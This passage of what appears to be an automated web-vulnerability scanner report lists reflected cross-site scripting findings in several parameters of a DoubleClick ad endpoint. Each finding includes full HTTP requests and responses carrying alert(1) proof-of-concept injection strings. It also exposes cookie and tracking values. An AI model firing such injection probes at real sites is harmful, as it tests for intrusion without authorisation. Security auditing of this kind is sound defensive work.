GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:28 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:28 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

5.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33655"-alert(1)-"02dc95746b was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6995
Date: Sat, 26 Mar 2011 01:38:15 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:15 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ad6/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

5.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7af1c'-alert(1)-'2429f82e180 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:20 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:20 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

5.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4ac"-alert(1)-"007c6132307 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:32 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:32 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fs
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c6a'-alert(1)-'c3ace347376 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:37 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:37 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

5.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c9ed'-alert(1)-'60d03a3f198 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:38:45 GMT
Expires: Sat, 26 Mar 2011 01:38:45 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

5.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ef8"-alert(1)-"92ebfe0424f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:38:41 GMT
Expires: Sat, 26 Mar 2011 01:38:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424fhttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fscUrl = url
...[SNIP]...

5.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bec3'-alert(1)-'b3534d6f54d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
